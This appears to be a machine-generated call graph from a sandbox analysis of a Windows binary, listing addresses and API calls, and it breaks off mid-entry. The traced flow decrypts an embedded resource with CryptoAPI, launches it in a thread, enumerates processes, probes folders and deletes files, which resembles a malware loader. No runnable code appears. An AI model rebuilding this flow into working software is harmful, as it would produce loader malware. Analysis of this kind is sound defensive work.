128734->128735 128735->128613 128736->128726 128737 6c6db2cd 128736->128737 128736->128743 128739 6c6db335 128737->128739 128740 6c6db340 128737->128740 128737->128743 128738 6c6db39e std::ios_base::_Ios_base_dtor 128738->128613 128913 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128739->128913 128741 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128740->128741 128741->128743 128743->128732 128743->128738 128745 6c6d91af 128744->128745 128746 6c6c4700 98 API calls 128745->128746 128747 6c6d91c5 128746->128747 128772 6c6d9240 std::ios_base::_Ios_base_dtor 128747->128772 128914 6c6d93d0 128747->128914 128752 6c6d9375 128752->128626 128753 6c6d9200 128754 6c6d938b 128753->128754 128755 6c6d921a 128753->128755 128756 6c6b9714 30 API calls 128754->128756 128757 6c6d928b 128755->128757 128758 6c6d9280 128755->128758 128764 6c6d921f __fread_nolock 128755->128764 128759 6c6d9390 128756->128759 128761 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128757->128761 128926 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128758->128926 128762 6c85c237 29 API calls 128759->128762 128761->128764 128763 6c6d9395 128762->128763 128929 6c6bc894 72 API calls std::ios_base::_Ios_base_dtor 128763->128929 128922 6c6d96ac 128764->128922 128766 6c6d93ad 128766->128626 128768 6c6d92d9 128769 6c6d92e8 128768->128769 128770 6c6d9351 128768->128770 128769->128759 128769->128772 128927 6c6bc572 72 API calls 128770->128927 128928 6c6bc894 72 API calls std::ios_base::_Ios_base_dtor 128772->128928 129011 6c6b8e2d 128773->129011 128775 6c6d9918 std::ios_base::_Ios_base_dtor 128775->128633 128776 6c6d988b std::ios_base::_Ios_base_dtor 128776->128775 128777 6c85c237 29 API calls 128776->128777 128778 6c6d993f 128777->128778 128779 6c6bc08c 29 API calls 128778->128779 128780 6c6d994e 128779->128780 128780->128633 128782 6c860696 128781->128782 128783 6c86068c 128781->128783 128784 6c8606e8 __wsopen_s 39 API calls 128782->128784 128785 6c86d709 2 API calls 128783->128785 128786 6c8606b0 128784->128786 128787 6c860693 128785->128787 128788 6c84ef42 __wsopen_s 17 API calls 128786->128788 128787->128657 128789 6c8606bd 128788->128789 128790 6c8606c4 128789->128790 129167 6c86d709 DeleteFileW 128789->129167 128792 6c8606e2 128790->128792 128793 6c8637d7 ___free_lconv_mon 14 API calls 128790->128793 128792->128657 128793->128792 128795 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128794->128795 128796 6c6da71c 128795->128796 128797 6c6db021 128796->128797 128798 6c6da79f 128796->128798 128799 6c6da7d1 128796->128799 128801 6c6da7ac std::ios_base::_Ios_base_dtor _Yarn 128796->128801 128800 6c6b9714 30 API calls 128797->128800 129171 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128798->129171 128802 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128799->128802 128804 6c6db02d 128800->128804 128806 6c6da85b GetFileAttributesA 128801->128806 128802->128801 128805 6c6b9714 30 API calls 128804->128805 128807 6c6db039 128805->128807 128809 6c6da86b SHGetFolderPathA 128806->128809 128814 6c6daf5b std::ios_base::_Ios_base_dtor 128806->128814 128808 6c6b9714 30 API calls 128807->128808 128810 6c6db045 128808->128810 128809->128814 128815 6c6da88d _strlen 128809->128815 128812 6c6b9714 30 API calls 128810->128812 128811 6c6dafb6 std::ios_base::_Ios_base_dtor 128811->128634 128813 6c6db051 128812->128813 128816 6c6b9714 30 API calls 128813->128816 128814->128811 128817 6c85c237 29 API calls 128814->128817 128815->128804 128819 6c6da8f9 128815->128819 128820 6c6da904 128815->128820 128826 6c6da8b4 _Yarn 128815->128826 128818 6c6db05d 128816->128818 128817->128797 128821 6c6bc08c 29 API calls 128818->128821 129172 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128819->129172 128824 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128820->128824 128823 6c6db06f 128821->128823 128823->128634 128824->128826 128825 6c6da960 129173 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128825->129173 128826->128807 128826->128825 128828 6c6daff6 128826->128828 128832 6c6da969 std::ios_base::_Ios_base_dtor _Yarn 128826->128832 128829 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128828->128829 128829->128832 128830 6c6dab11 129174 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128830->129174 128832->128810 128832->128814 128832->128830 128833 6c6db00e 128832->128833 128839 6c6dab1e std::ios_base::_Ios_base_dtor _Yarn 128832->128839 128834 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128833->128834 128834->128839 128835 6c6dac91 129175 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128835->129175 128837 6c6daf0a 128838 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128837->128838 128841 6c6daca1 std::ios_base::_Ios_base_dtor _Yarn 128838->128841 128839->128813 128839->128814 128839->128835 128839->128837 128839->128841 128840 6c6dae63 GetFileAttributesA 128840->128814 128842 6c6dae73 CoInitialize CoCreateInstance 128840->128842 128841->128814 128841->128840 128843 6c6dae9b MultiByteToWideChar 128842->128843 128844 6c6daf55 CoUninitialize 128842->128844 128847 6c6daed5 128843->128847 128844->128814 128846 6c6daf43 128846->128844 128847->128846 128848 6c6daf1e MultiByteToWideChar 128847->128848 128848->128846 128850 6c6db446 _strlen 128849->128850 128851 6c6db61e 128850->128851 128852 6c6db451 128850->128852 128853 6c6b9714 30 API calls 128851->128853 128855 6c6db49a 128852->128855 128856 6c6db492 128852->128856 128862 6c6db458 _Yarn 128852->128862 128854 6c6db623 128853->128854 129178 6c6c107e 30 API calls 128854->129178 128859 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128855->128859 129176 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128856->129176 128859->128862 128860 6c6db62f 128861 6c6b9714 30 API calls 128860->128861 128874 6c6db540 _Yarn 128861->128874 128862->128854 128865 6c6db517 std::ios_base::_Ios_base_dtor 128862->128865 128867 6c6db509 128862->128867 128863 6c85c237 29 API calls 128864 6c6db640 128863->128864 128866 6c6bc08c 29 API calls 128864->128866 128865->128641 128868 6c6db64f 128866->128868 128867->128860 128869 6c6db538 128867->128869 128868->128641 128870 6c6db585 128869->128870 128871 6c6db597 128869->128871 128869->128874 129177 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128870->129177 128873 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128871->128873 128873->128874 128874->128863 128874->128865 128876 6c6db112 _strlen 128875->128876 128877 6c6db119 128876->128877 128878 6c6db190 128876->128878 128880 6c6db15c 128877->128880 128881 6c6db154 128877->128881 128884 6c6db120 _Yarn 128877->128884 128879 6c6b9714 30 API calls 128878->128879 128879->128878 128883 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128880->128883 129179 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128881->129179 128883->128884 128884->128645 128886 6c6d841a _strlen 128885->128886 128887 6c6d8421 128886->128887 128888 6c6d8493 128886->128888 128890 6c6d845c 128887->128890 128891 6c6d8464 128887->128891 128895 6c6d8428 _Yarn 128887->128895 128889 6c6b9714 30 API calls 128888->128889 128896 6c6d8498 128889->128896 129180 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128890->129180 128894 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128891->128894 128892 6c6d84c1 std::ios_base::_Ios_base_dtor 128892->128648 128894->128895 128895->128648 128896->128892 128897 6c85c237 29 API calls 128896->128897 128898 6c6d84f4 128897->128898 128899 6c6d851d std::ios_base::_Ios_base_dtor 128898->128899 128900 6c85c237 29 API calls 128898->128900 128899->128648 128900->128898 128907 6c6d998d Concurrency::details::ExternalContextBase::~ExternalContextBase _Yarn ~refcount_ptr 128901->128907 128902 6c6d9ac6 LockResource 128902->128907 128903 6c6d9a46 LoadResource SizeofResource 128903->128907 128904 6c6d9a86 FindResourceW 128904->128907 128905 6c6d9b0c CreateThread 128905->128661 129245 6c6d9b14 128905->129245 128907->128902 128907->128903 128907->128904 128907->128905 129181 6c6d8986 128907->129181 128908->128611 128909->128637 128910->128658 128911->128624 128912->128736 128913->128743 128915 6c6d940c 128914->128915 128916 6c6d91e1 128915->128916 128930 6c6bf1a2 128915->128930 128918 6c6d94fa 128916->128918 128919 6c6d955f 128918->128919 128920 6c6d95ac 128919->128920 128921 6c6bf1a2 70 API calls 128919->128921 128920->128753 128921->128920 128923 6c6d96f6 128922->128923 128924 6c6d972a 128923->128924 129007 6c6be4d8 128923->129007 128924->128768 128926->128764 128927->128772 128928->128752 128929->128766 128931 6c6bf1ca 128930->128931 128932 6c6bf64a 128931->128932 128935 6c6bfd78 69 API calls 128931->128935 128936 6c85f390 128931->128936 128950 6c85b16e 128931->128950 128932->128916 128935->128931 128937 6c85f3b0 128936->128937 128938 6c85f39b 128936->128938 128939 6c85f3cd 128937->128939 128940 6c85f3b8 128937->128940 128958 6c84f976 14 API calls ___free_lconv_mon 128938->128958 128954 6c85fa65 128939->128954 128960 6c84f976 14 API calls ___free_lconv_mon 128940->128960 128944 6c85f3a0 128959 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 128944->128959 128946 6c85f3bd 128961 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 128946->128961 128947 6c85f3c8 128947->128931 128948 6c85f3ab 128948->128931 128951 6c85b181 swprintf 128950->128951 128952 6c85b3e7 67 API calls 128951->128952 128953 6c85b196 swprintf 128952->128953 128953->128931 128955 6c85fa79 swprintf 128954->128955 128962 6c86000e 128955->128962 128957 6c85fa85 swprintf 128957->128947 128958->128944 128959->128948 128960->128946 128961->128947 128963 6c86001a ___scrt_is_nonwritable_in_current_image 128962->128963 128964 6c860044 128963->128964 128965 6c860021 128963->128965 128973 6c84f83a EnterCriticalSection 128964->128973 128988 6c85c3d0 29 API calls 2 library calls 128965->128988 128968 6c86003a 128968->128957 128969 6c860052 128974 6c85fe6d 128969->128974 128971 6c860061 128989 6c860093 LeaveCriticalSection __fread_nolock 128971->128989 128973->128969 128975 6c85fea4 128974->128975 128976 6c85fe7c 128974->128976 128978 6c85b10d __fread_nolock 29 API calls 128975->128978 128993 6c85c3d0 29 API calls 2 library calls 128976->128993 128979 6c85fead 128978->128979 128990 6c86a02c 128979->128990 128982 6c85ff57 128994 6c85faf7 34 API calls 4 library calls 128982->128994 128984 6c85ff6e 128985 6c85fe97 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 128984->128985 128995 6c85fca2 33 API calls 2 library calls 128984->128995 128985->128971 128986 6c85ff66 128986->128985 128988->128968 128989->128968 128996 6c86a04a 128990->128996 128993->128985 128994->128986 128995->128985 128997 6c86a056 ___scrt_is_nonwritable_in_current_image 128996->128997 128998 6c86a099 128997->128998 129000 6c86a0df 128997->129000 129006 6c85fecb 128997->129006 128999 6c85c3d0 swprintf 29 API calls 128998->128999 128999->129006 129001 6c85b941 __wsopen_s EnterCriticalSection 129000->129001 129002 6c86a0e5 129001->129002 129003 6c86a106 129002->129003 129004 6c86a16f __fread_nolock 31 API calls 129002->129004 129005 6c86a167 LeaveCriticalSection 129003->129005 129004->129003 129005->129006 129006->128982 129006->128984 129006->128985 129008 6c6be50b _Yarn 129007->129008 129009 6c6beca4 129008->129009 129010 6c85f71f 45 API calls __fread_nolock 129008->129010 129009->128924 129010->129008 129065 6c6b84fc 129011->129065 129013 6c6b8e6a 129016 6c6b8eab _Yarn 129013->129016 129087 6c6b9d9a 54 API calls 3 library calls 129013->129087 129015 6c6b8f05 CryptAcquireContextW 129017 6c6b8f31 CryptImportKey 129015->129017 129018 6c6b9357 129015->129018 129016->129015 129019 6c6b93a5 CryptReleaseContext 129017->129019 129020 6c6b8f75 CryptSetKeyParam 129017->129020 129091 6c84cc23 29 API calls 2 library calls 129018->129091 129093 6c84cc23 29 API calls 2 library calls 129019->129093 129023 6c6b93f8 CryptDestroyKey CryptReleaseContext 129020->129023 129024 6c6b8f8d CryptSetKeyParam 129020->129024 129095 6c84cc23 29 API calls 2 library calls 129023->129095 129028 6c6b8fac 129024->129028 129029 6c6b9456 CryptDestroyKey CryptReleaseContext 129024->129029 129025 6c6b9382 129092 6c84c646 RaiseException 129025->129092 129026 6c6b93d5 129094 6c84c646 RaiseException 129026->129094 129034 6c6b9023 CryptDecrypt CryptDestroyKey CryptReleaseContext 129028->129034 129039 6c6b8fe8 129028->129039 129040 6c6b8fdd 129028->129040 129048 6c6b950a 129028->129048 129097 6c84cc23 29 API calls 2 library calls 129029->129097 129032 6c6b9433 129096 6c84c646 RaiseException 129032->129096 129037 6c6b94b1 129034->129037 129049 6c6b9057 129034->129049 129035 6c6b939d 129042 6c6b9714 30 API calls 129035->129042 129099 6c84cc23 29 API calls 2 library calls 129037->129099 129038 6c6b9491 129098 6c84c646 RaiseException 129038->129098 129046 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129039->129046 129088 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129040->129088 129042->129048 129044 6c6b94d9 129100 6c84c646 RaiseException 129044->129100 129057 6c6b8fe3 _Yarn 129046->129057 129101 6c6b8792 129048->129101 129049->129048 129050 6c6b90ea 129049->129050 129051 6c6b90c0 129049->129051 129064 6c6b9067 std::ios_base::_Ios_base_dtor _Yarn __fread_nolock 129049->129064 129058 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129050->129058 129089 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129051->129089 129053 6c6b91d9 129055 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129053->129055 129054 6c6b91c9 129090 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129054->129090 129063 6c6b9187 std::ios_base::_Ios_base_dtor _Yarn 129055->129063 129057->129034 129058->129064 129060 6c6b952a 129060->128776 129061 6c85c237 29 API calls 129061->129018 129062 6c6b932d std::ios_base::_Ios_base_dtor 129062->128776 129063->129061 129063->129062 129064->129035 129064->129053 129064->129054 129064->129063 129066 6c6b853a CryptStringToBinaryA 129065->129066 129067 6c6b8538 129065->129067 129068 6c6b85da 129066->129068 129070 6c6b8553 129066->129070 129067->129066 129149 6c6b864e 29 API calls ___std_exception_copy 129068->129149 129071 6c6b8632 129070->129071 129077 6c6b857d 129070->129077 129078 6c6b8575 129070->129078 129083 6c6b857b __fread_nolock 129070->129083 129084 6c6b8792 70 API calls 129071->129084 129072 6c6b85e9 129150 6c84c646 RaiseException 129072->129150 129073 6c6b85b0 CryptStringToBinaryA 129074 6c6b85c7 129073->129074 129075 6c6b85f4 129073->129075 129074->129013 129151 6c84cc23 29 API calls 2 library calls 129075->129151 129081 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129077->129081 129148 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129078->129148 129081->129083 129082 6c6b8617 129152 6c84c646 RaiseException 129082->129152 129083->129073 129086 6c6b8649 129084->129086 129086->129013 129087->129016 129088->129057 129089->129064 129090->129063 129091->129025 129092->129035 129093->129026 129094->129035 129095->129032 129096->129035 129097->129038 129098->129035 129099->129044 129100->129035 129102 6c6b879d 129101->129102 129103 6c6b87c2 std::ios_base::_Ios_base_dtor 129101->129103 129102->129103 129104 6c85c237 29 API calls 129102->129104 129103->129060 129105 6c6b87e4 CryptAcquireContextW 129104->129105 129106 6c6b8dac 129105->129106 129147 6c6b884f std::ios_base::_Ios_base_dtor _Yarn __fread_nolock 129105->129147 129165 6c84cc23 29 API calls 2 library calls 129106->129165 129108 6c6b8dd4 129166 6c84c646 RaiseException 129108->129166 129109 6c6b8abb CryptReleaseContext 129132 6c6b8ada std::ios_base::_Ios_base_dtor 129109->129132 129110 6c6b8899 CryptCreateHash 129112 6c6b8ce4 CryptReleaseContext 129110->129112 129110->129147 129161 6c84cc23 29 API calls 2 library calls 129112->129161 129114 6c6b88ba CryptHashData 129116 6c6b8d40 CryptDestroyHash CryptReleaseContext 129114->129116 129114->129147 129115 6c6b8d16 129162 6c84c646 RaiseException 129115->129162 129163 6c84cc23 29 API calls 2 library calls 129116->129163 129117 6c6b8792 54 API calls 129120 6c6b8e04 129117->129120 129122 6c6b8792 54 API calls 129120->129122 129121 6c6b8d7b 129164 6c84c646 RaiseException 129121->129164 129124 6c6b8e0c 129122->129124 129124->129060 129125 6c6b891d CryptHashData 129127 6c6b893a CryptGetHashParam 129125->129127 129128 6c6b8c28 CryptDestroyHash CryptReleaseContext 129125->129128 129126 6c85c237 29 API calls 129126->129106 129130 6c6b8c86 CryptDestroyHash CryptReleaseContext 129127->129130 129127->129147 129157 6c84cc23 29 API calls 2 library calls 129128->129157 129129 6c6b8bb3 std::ios_base::_Ios_base_dtor 129129->129060 129159 6c84cc23 29 API calls 2 library calls 129130->129159 129132->129126 129132->129129 129133 6c6b8c63 129158 6c84c646 RaiseException 129133->129158 129135 6c6b8cc1 129160 6c84c646 RaiseException 129135->129160 129136 6c6b8a6c CryptGetHashParam CryptDestroyHash 129139 6c6b8bd6 CryptReleaseContext 129136->129139 129136->129147 129155 6c84cc23 29 API calls 2 library calls 129139->129155 129140 6c6b8c20 129140->129117 129143 6c6b8c05 129156 6c84c646 RaiseException 129143->129156 129144 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129144->129147 129147->129109 129147->129110 129147->129114 129147->129125 129147->129132 129147->129136 129147->129144 129153 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129147->129153 129154 6c6b9d9a 54 API calls 3 library calls 129147->129154 129148->129083 129149->129072 129150->129075 129151->129082 129152->129071 129153->129147 129154->129147 129155->129143 129156->129140 129157->129133 129158->129140 129159->129135 129160->129140 129161->129115 129162->129140 129163->129121 129164->129140 129165->129108 129166->129140 129168 6c86d72d 129167->129168 129169 6c86d71b GetLastError 129167->129169 129168->128790 129170 6c86d727 129169->129170 129170->128790 129171->128801 129172->128826 129173->128832 129174->128839 129175->128841 129176->128862 129177->128874 129179->128884 129180->128895 129182 6c6d8a00 _strlen 129181->129182 129183 6c6d8f02 129182->129183 129186 6c6d8a6e 129182->129186 129187 6c6d8a59 129182->129187 129193 6c6d8a12 _Yarn 129182->129193 129184 6c6b9714 30 API calls 129183->129184 129185 6c6d8f11 129184->129185 129189 6c6bc08c 29 API calls 129185->129189 129188 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129186->129188 129213 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129187->129213 129188->129193 129191 6c6d8f29 129189->129191 129191->128907 129192 6c6b8e2d 84 API calls 129194 6c6d8ac0 std::ios_base::_Ios_base_dtor 129192->129194 129193->129192 129196 6c6d8ea1 129194->129196 129214 6c6d8f8e 44 API calls 129194->129214 129197 6c85c237 29 API calls 129196->129197 129201 6c6d8ec4 std::ios_base::_Ios_base_dtor 129196->129201 129197->129183 129200 6c6d8e59 std::ios_base::_Ios_base_dtor 129200->129196 129216 6c6d90a2 29 API calls std::ios_base::_Ios_base_dtor 129200->129216 129201->128907 129202 6c6d8ee9 129217 6c6c107e 30 API calls 129202->129217 129204 6c6d8eee 129205 6c6b9714 30 API calls 129204->129205 129206 6c6d8ef3 129205->129206 129208 6c6b9714 30 API calls 129206->129208 129207 6c6d8ef8 129218 6c6c107e 30 API calls 129207->129218 129208->129207 129210 6c6d8b63 std::ios_base::_Ios_base_dtor _Yarn 129210->129196 129210->129200 129210->129202 129210->129204 129210->129206 129210->129207 129211 6c6b971e 30 API calls 129210->129211 129212 6c6e1139 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 129210->129212 129215 6c6dd267 30 API calls 129210->129215 129211->129210 129212->129210 129213->129193 129214->129210 129215->129210 129216->129196 129234 6c6da489 std::ios_base::_Ios_base_dtor _Yarn _strlen 129219->129234 129220 6c6da596 _strlen 129221 6c6b9714 30 API calls 129220->129221 129222 6c6da5c3 129220->129222 129221->129220 129226 6c6da603 129222->129226 129227 6c6da612 129222->129227 129230 6c6da5ca _Yarn 129222->129230 129224 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129224->129234 129303 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129226->129303 129229 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129227->129229 129229->129230 129304 6c6d9d68 32 API calls 4 library calls 129230->129304 129231 6c6da564 Sleep 129231->129234 129233 6c6da6a2 129236 6c85c237 29 API calls 129233->129236 129234->129220 129234->129224 129234->129231 129234->129233 129247 6c6d9b7b CreateToolhelp32Snapshot 129234->129247 129302 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129234->129302 129235 6c6da64f 129235->129233 129237 6c6da675 std::ios_base::_Ios_base_dtor 129235->129237 129238 6c6da6a7 129236->129238 129239 6c6bc08c 29 API calls 129238->129239 129240 6c6da6b6 129239->129240 129242 6c6d9b4c 129241->129242 129243 6c6d9b60 Sleep 129242->129243 129244 6c6d9b5e 129242->129244 129243->129242 129246 6c6d9b1c 129245->129246 129248 6c6d9d44 129247->129248 129249 6c6d9b97 __fread_nolock 129247->129249 129248->129234 129250 6c6d9bad Process32FirstW 129249->129250 129251 6c6d9d3d CloseHandle 129250->129251 129264 6c6d9bcd std::ios_base::_Ios_base_dtor _Yarn _strlen 129250->129264 129251->129248 129252 6c6d9bd6 WideCharToMultiByte 129252->129264 129253 6c6d9d5e 129254 6c6b9714 30 API calls 129253->129254 129255 6c6d9d63 129254->129255 129256 6c6d9d68 SHGetFolderPathA 129255->129256 129257 6c85c237 29 API calls 129255->129257 129258 6c6da35f 129256->129258 129261 6c6d9dbd _strlen 129256->129261 129257->129256 129258->129234 129260 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129260->129264 129262 6c6da3e1 129261->129262 129266 6c6d9e1e 129261->129266 129267 6c6d9e26 129261->129267 129279 6c6d9de4 _Yarn 129261->129279 129263 6c6b9714 30 API calls 129262->129263 129265 6c6da3e6 129263->129265 129264->129252 129264->129253 129264->129255 129264->129260 129268 6c6d9d51 CloseHandle 129264->129268 129269 6c6d9d23 Process32NextW 129264->129269 129305 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129264->129305 129270 6c6b9714 30 API calls 129265->129270 129306 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129266->129306 129272 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129267->129272 129268->129248 129269->129251 129269->129252 129273 6c6da3f2 129270->129273 129272->129279 129275 6c6b9714 30 API calls 129273->129275 129274 6c6d9ec4 std::ios_base::_Ios_base_dtor _Yarn 129274->129273 129286 6c6da014 129274->129286 129288 6c6da3dc 129274->129288 129289 6c6da3a6 129274->129289 129294 6c6da024 std::ios_base::_Ios_base_dtor _Yarn 129274->129294 129276 6c6da3fe 129275->129276 129278 6c6b9714 30 API calls 129276->129278 129277 6c6d9eb4 129307 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129277->129307 129281 6c6da40a 129278->129281 129279->129265 129279->129274 129279->129277 129283 6c6da3c4 129279->129283 129282 6c6bc08c 29 API calls 129281->129282 129284 6c6da419 129282->129284 129285 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129283->129285 129284->129234 129285->129274 129308 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129286->129308 129290 6c85c237 29 API calls 129288->129290 129291 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129289->129291 129290->129262 129291->129294 129292 6c6da171 129309 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129292->129309 129294->129276 129294->129288 129294->129292 129295 6c6da388 129294->129295 129299 6c6da181 std::ios_base::_Ios_base_dtor _Yarn 129294->129299 129296 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129295->129296 129296->129299 129297 6c6da2f1 std::ios_base::_Ios_base_dtor 129298 6c6da31d DeleteFileA 129297->129298 129297->129299 129298->129258 129300 6c6da32c 129298->129300 129299->129288 129299->129297 129300->129288 129301 6c6da34e std::ios_base::_Ios_base_dtor 129300->129301 129301->129258 129302->129234 129303->129230 129304->129235 129305->129264 129306->129279 129307->129274 129308->129294 129309->129299 129310->128694 129311->128715 129312->128681 129316 1001f927 129317 1001fb9a 129316->129317 129321 100060df 71 API calls 129317->129321 129322 1001f997 129317->129322 129326 10005ef8 129317->129326 129318 1001fb9c 129321->129318 129324 10005f68 129322->129324 129323 1001f2fd 129324->129323 129325 10001100 70 API calls 129324->129325 129325->129323 129327 10005f68 129326->129327 129328 1001f2fd 129327->129328 129329 10001100 70 API calls 129327->129329 129329->129328 129330 10005eb2 Sleep 129331 10006f17 77 API calls 129330->129331 129332 10005ec9 129331->129332 129333 6c6dd7df 129334 6c6dd7ef ___std_exception_copy 129333->129334 129335 6c6e1262 32 API calls 129334->129335 129336 6c6dd81e 129335->129336 129337 6c6e1262 32 API calls 129336->129337 129338 6c6dd841 129337->129338 129339 6c6e1262 32 API calls 129338->129339 129340 6c6dd898 129339->129340 129345 6c6dbfd6 129340->129345 129352 6c73731e 129345->129352 129347 6c6dc013 129364 6c735c74 129347->129364 129353 6c73732a __EH_prolog3 129352->129353 129370 6c6e3fff 129353->129370 129359 6c73738f 129398 6c6dfaf8 129359->129398 129361 6c73739c 129409 6c6e35a7 129361->129409 129363 6c7373ab Concurrency::details::ExternalContextBase::~ExternalContextBase 129363->129347 129446 6c74027c 129364->129446 129371 6c6e400e __EH_prolog3_GS 129370->129371 129416 6c75ccad 129371->129416 129373 6c6e4024 129374 6c6e4039 129373->129374 129422 6c85d2d7 29 API calls 3 library calls 129373->129422 129376 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 129374->129376 129377 6c6e4046 129376->129377 129378 6c6e4159 129377->129378 129380 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 129377->129380 129423 6c75e7dc RaiseException CallUnexpected 129378->129423 129382 6c6e405d 129380->129382 129382->129378 129383 6c6e4065 GetCurrentThread GetCurrentThreadId GetVersionExW 129382->129383 129384 6c6e411c 129383->129384 129385 6c7a12be 5 API calls 129384->129385 129386 6c6e4156 129385->129386 129387 6c6b1f44 129386->129387 129388 6c6b1f7f 129387->129388 129389 6c6b1f83 129388->129389 129433 6c6b287a 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129388->129433 129392 6c737608 129389->129392 129391 6c6b1fb6 129393 6c737614 __EH_prolog3 129392->129393 129394 6c73761f Concurrency::details::ExternalContextBase::~ExternalContextBase 129393->129394 129395 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129393->129395 129394->129359 129396 6c73762b 129395->129396 129396->129394 129434 6c7e171c 129396->129434 129399 6c6dfb33 129398->129399 129400 6c6dfb8a 129399->129400 129401 6c6dfb37 129399->129401 129443 6c6b287a 40 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129400->129443 129404 6c6dfb67 129401->129404 129405 6c6dfb55 129401->129405 129403 6c6dfb9b 129403->129361 129442 6c6b44da 68 API calls 129404->129442 129441 6c6b1fca 104 API calls 129405->129441 129407 6c6dfb65 129407->129361 129410 6c6e35d2 129409->129410 129411 6c6e35bf 129409->129411 129410->129363 129412 6c6e35e4 129411->129412 129413 6c6e35cb 129411->129413 129445 6c6b45a0 68 API calls 5 library calls 129412->129445 129444 6c6e3688 68 API calls 129413->129444 129417 6c75ccb9 __EH_prolog3 129416->129417 129418 6c75fac2 72 API calls 129417->129418 129419 6c75ccc3 129418->129419 129424 6c75d0ae 129419->129424 129421 6c75ccdb Concurrency::details::ExternalContextBase::~ExternalContextBase 129421->129373 129422->129374 129427 6c75c98e 129424->129427 129426 6c75d0c5 GetCursorPos 129426->129421 129428 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 129427->129428 129429 6c75c99d 129428->129429 129429->129426 129432 6c84c646 RaiseException 129429->129432 129431 6c75e7f5 129432->129431 129433->129391 129435 6c7e172e SHGetMalloc 129434->129435 129436 6c7e174a 129434->129436 129435->129436 129437 6c7e1746 129435->129437 129440 6c75e7dc RaiseException CallUnexpected 129436->129440 129437->129394 129441->129407 129442->129407 129443->129403 129444->129410 129445->129410 129447 6c740288 __EH_prolog3 129446->129447 129448 6c75fac2 72 API calls 129447->129448 129449 6c740292 129448->129449 129452 6c740793 129449->129452 129453 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 129452->129453 129454 6c7407d5 129453->129454 129455 6c80e632 Concurrency::details::ExternalContextBase::~ExternalContextBase 6 API calls 129454->129455 129456 6c7407de 129455->129456 129457 6c7a12dc RaiseException 129456->129457 129458 6c7407e7 129457->129458 129459 6c80e6a6 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 129458->129459 129461 6c6d029e 129463 6c6d02b3 std::ios_base::_Ios_base_dtor _Yarn 129461->129463 129462 6c85c237 29 API calls 129464 6c6d0a88 129462->129464 129465 